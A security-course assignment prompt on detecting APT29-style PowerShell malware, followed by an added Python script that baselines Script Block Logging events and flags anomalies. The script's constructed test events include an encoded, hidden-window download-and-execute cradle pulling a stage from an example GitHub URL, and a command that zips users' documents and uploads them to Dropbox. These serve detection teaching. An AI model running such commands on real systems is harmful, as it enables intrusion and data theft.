Establish a baseline of normal use

Reference no: EM131376785

Take a look at this malware used by APT29, a Russian hacking group. This is very advanced malware, and very stealthy: it executes through normal IT processes such as PowerShell, which is exactly why every Security Operations Center needs to keep monitoring the changing threat picture. Most organizations do not monitor PowerShell use at all. To monitor it, an organization first needs to upgrade to PowerShell 5 (which adds script block logging), then start ingesting those logs into a correlated event management system (a SIEM). The organization then needs to establish a baseline of normal use in order to recognize an anomaly. Additionally, a lot of commercial organizations use GitHub and cloud storage, and this malware uses both, so its traffic blends in with legitimate use. This type of attack is very hard to defend against.

Please answer the following:

1. What are some of the methods you would use to detect anomalous PowerShell activity?

2. As a security professional, what steps would you take to defend against, detect, and remediate this type of attack?

Requirements:

Needs to be in APA format with a minimum of 2 resources. Minimum 300 words.
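The detection pipeline the prompt describes (PowerShell 5 script block logging, SIEM ingestion, a baseline of normal use, then anomaly detection) can be shown end to end in a few dozen lines. The following Python script is an added example written for this page; it is not part of the original assignment text and is not any vendor's product. It assumes the SIEM has already ingested Microsoft-Windows-PowerShell/Operational Event ID 4104 (Script Block Logging) from PowerShell 5 hosts and exposes each event as a (timestamp, host, user, script block text) tuple. Every event, host name, user name and URL in it is constructed for the example; the helper names (encode_command, expand, build_baseline, score, detect) are this example's own.

```python
"""Baseline-then-anomaly triage over PowerShell Script Block Logging (Event ID 4104) events.

Added example, not from the original assignment text and not any vendor's product.
Assumption: the SIEM has already ingested Microsoft-Windows-PowerShell/Operational
Event ID 4104 from PowerShell 5 hosts and exposes each event as
(timestamp, host, user, script_block_text). All events, users and URLs below are constructed.
"""
import base64
import re
from collections import defaultdict

# Argument to powershell.exe -EncodedCommand: base64 of UTF-16LE text. Matching on the raw
# blob tells you encoding was used; the download cradle inside is only visible after decoding.
ENCODED = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{20,})", re.I)

# Indicators counted on top of the baseline. They run over the script block text *and*
# over the decoded form of any -EncodedCommand payload in it.
INDICATORS = {
    "encoded_command": ENCODED,
    "web_client": re.compile(
        r"(Net\.WebClient|DownloadString|DownloadFile|Invoke-WebRequest|Invoke-RestMethod"
        r"|\biwr\b|\birm\b|Start-BitsTransfer)", re.I),
    "invoke_expression": re.compile(r"\b(iex|Invoke-Expression)\b", re.I),
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "policy_bypass": re.compile(r"-(?:ep|exec|executionpolicy)\s+bypass", re.I),
    # The prompt's point: the malware stages through GitHub and cloud storage, so those
    # hosts inside a script block are a signal even though the traffic itself looks benign.
    "cloud_service_url": re.compile(
        r"(github\.com|githubusercontent\.com|dropbox|onedrive\.live\.com|drive\.google\.com)",
        re.I),
}
CMDLET = re.compile(r"\b([a-z]{2,}-[a-z]{2,})\b", re.I)  # Verb-Noun tokens, e.g. Get-Service


def encode_command(command: str) -> str:
    """Produce what powershell.exe -EncodedCommand takes: base64 over UTF-16LE text."""
    return base64.b64encode(command.encode("utf-16-le")).decode("ascii")


def expand(block: str) -> str:
    """Return the block plus the plaintext of every -EncodedCommand argument found in it."""
    text = block
    for blob in ENCODED.findall(block):
        try:
            text += "\n" + base64.b64decode(blob).decode("utf-16-le", errors="replace")
        except ValueError:  # binascii.Error is a ValueError: not base64 after all, keep raw text
            pass
    return text


def cmdlets(text: str) -> set:
    return {m.lower() for m in CMDLET.findall(text)}


def indicators(text: str) -> set:
    return {name for name, rx in INDICATORS.items() if rx.search(text)}


def build_baseline(events):
    """Per (host, user): the cmdlets seen during a quiet window. This is 'normal use'."""
    baseline = defaultdict(set)
    for _ts, host, user, block in events:
        baseline[(host, user)] |= cmdlets(expand(block))
    return dict(baseline)


def score(event, baseline):
    """List the reasons an event deviates from the baseline; an empty list means routine."""
    _ts, host, user, block = event
    text = expand(block)
    reasons = []
    known = baseline.get((host, user))
    if known is None:
        reasons.append("no_powershell_history_for_principal")
    else:
        new = cmdlets(text) - known
        if new:
            reasons.append("new_cmdlets:" + ",".join(sorted(new)))
    reasons.extend(sorted(indicators(text)))
    return reasons


def detect(events, baseline, min_reasons=2):
    """Events with at least min_reasons deviations. One new cmdlet on its own is not an
    alert (admins learn new cmdlets); the threshold keeps the baseline from paging on that."""
    hits = []
    for ev in events:
        reasons = score(ev, baseline)
        if len(reasons) >= min_reasons:
            hits.append((ev[0], ev[1], ev[2], reasons))
    return hits


# Constructed baseline window: routine admin use observed over a quiet period.
BASELINE_EVENTS = [
    ("2017-01-09T08:01", "WS01", "CORP\\alice", "Get-Service | Where-Object Status -eq 'Running'"),
    ("2017-01-09T08:05", "WS01", "CORP\\alice",
     "Get-Process | Sort-Object CPU -Descending | Select-Object -First 5"),
    ("2017-01-09T09:10", "SRV02", "CORP\\bob", "Get-ADUser -Filter * -Properties LastLogonDate"),
    ("2017-01-10T09:12", "SRV02", "CORP\\bob", "Get-EventLog -LogName System -Newest 50"),
]

# Constructed later window: two routine events, one encoded download cradle pulling a stage
# from GitHub, and a never-before-seen service account pushing an archive to cloud storage.
STAGER = ("IEX (New-Object Net.WebClient).DownloadString("
          "'https://raw.githubusercontent.com/example/repo/stage2.ps1')")
NEW_EVENTS = [
    ("2017-01-11T08:02", "WS01", "CORP\\alice", "Get-Service spooler | Restart-Service"),
    ("2017-01-11T09:00", "SRV02", "CORP\\bob", "Get-EventLog -LogName Application -Newest 20"),
    ("2017-01-11T13:40", "WS01", "CORP\\alice",
     "powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Enc " + encode_command(STAGER)),
    ("2017-01-11T23:55", "SRV02", "CORP\\svc_backup",
     r"Get-ChildItem C:\Users -Recurse -Include *.docx | Compress-Archive -DestinationPath "
     r"$env:TEMP\docs.zip; Invoke-RestMethod -Uri https://api.dropboxapi.com/2/files/upload "
     r"-Method Post -InFile $env:TEMP\docs.zip"),
]

if __name__ == "__main__":
    for ts, host, user, reasons in detect(NEW_EVENTS, build_baseline(BASELINE_EVENTS)):
        print(f"{ts} {host} {user}: " + "; ".join(reasons))
```

Two practitioner points the script makes concrete. First, none of this works until Script Block Logging is actually on: the 4104 events only exist after PowerShell 5 is installed and the "Turn on PowerShell Script Block Logging" policy (Computer Configuration > Administrative Templates > Windows Components > Windows PowerShell) is enabled, and the operational log must then be forwarded to the SIEM. Second, the baseline has to be per principal and per host: Restart-Service from the workstation admin who already runs Get-Service is a learning curve, not an incident, which is why a single new cmdlet scores below the alert threshold, while an encoded, hidden-window download from GitHub by that same user, or any PowerShell at all from a service account with no history, clears it.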
